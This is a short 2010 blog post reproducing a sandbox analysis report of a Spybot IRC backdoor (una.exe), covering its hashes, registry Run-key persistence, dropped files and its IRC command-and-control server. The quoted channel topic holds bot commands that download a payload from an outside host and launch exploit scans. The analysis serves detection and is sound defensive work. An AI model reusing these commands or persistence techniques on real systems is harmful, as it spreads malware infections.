irc.soccerboss.net

By Pig, April 6, 2010

una.exe : INFECTED with W32/Backdoor (Signature: W32/Spybot)

[ DetectionInfo ]
* Filename: C:analyzerscanuna.exe.
* Sandbox name: W32/Backdoor.
* Signature name: W32/Spybot.EDJV.
* Compressed: NO.
* TLS hooks: NO.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.

[ General information ]
* Drops files in %WINSYS% folder.
* File length: 261120 bytes.
* MD5 hash: 25c27980fc56bc28579b1cf565ca67d8.
* SHA1 hash: b94aab00bf55fb7292cf41267dabcfcb23920214.
* Entry-point detection: Microsoft Visual C++.

[ Changes to filesystem ]
* Creates file C:a.bat.
* Creates file C:WINDOWSsystem32msconfig.exe.
* Overwrites file c:a.bat.
* Deletes file 132.

[ Changes to registry ]
* Creates value “DRam prosessor”=”msconfig.exe” in key “HKLMSoftwareMicrosoftWindowsCurrentVersionRun”.
* Sets value “DRam prosessor”=”msconfig.exe” in key “HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices”.
* Creates key “HKCUSoftwareMicrosoftOLE”.
* Sets value “DRam prosessor”=”msconfig.exe” in key “HKCUSoftwareMicrosoftOLE”.
* Accesses Registry key “HKLMSoftwareMicrosoftOLE”.
* Accesses Registry key “HKLMSYSTEMCurrentControlSetControlLsa”.
* Sets value “restrictanonymous”=”x01” in key “HKLMSystemCurrentControlSetControlLsa”.

[ Network services ]
* Looks for an Internet connection.
* Connects to “irc.soccerboss.net” on port 6667 (TCP).
* Connects to IRC server.
* IRC: Uses nickname XP|00|USA|SP0|1407.
* IRC: Uses username iwqk.
* IRC: Joins channel #bum.
[03:42] * Topic is ‘@scan -S|@http http://dashuria.altervista.org/une.exe|@advscan exp_sp3 35 3 0 -b -e -r|@advscan exp_sp2 35 3 0 -b -e -r|@advscan exp_sp3 15 3 0 -a -e -r|@advscan exp_sp2 15 3 0 -a -e -r’
[03:42] * Set by Besi on Mon Apr 05 15:46:07
* IRC: Sets the usermode for user XP|00|USA|SP0|1407 to +x+iB.

[ Process/window information ]
* Creates process “CMD.EXE””.
* Creates a mutex dullabot.
* Creates process “msconfig.exe”.
* Will automatically restart after boot (I’ll be back…).
* Checks if privilege “SeDebugPrivilege” is available.
* Enables privilege SeDebugPrivilege.
* Enumerates running processes.
* Disables privilege SeDebugPrivilege.

[ Signature Scanning ]
* C:a.bat (5894 bytes) : WinREG.A.
* C:WINDOWSsystem32msconfig.exe (261120 bytes) : W32/Spybot.EDJV.

Categories: Uncategorized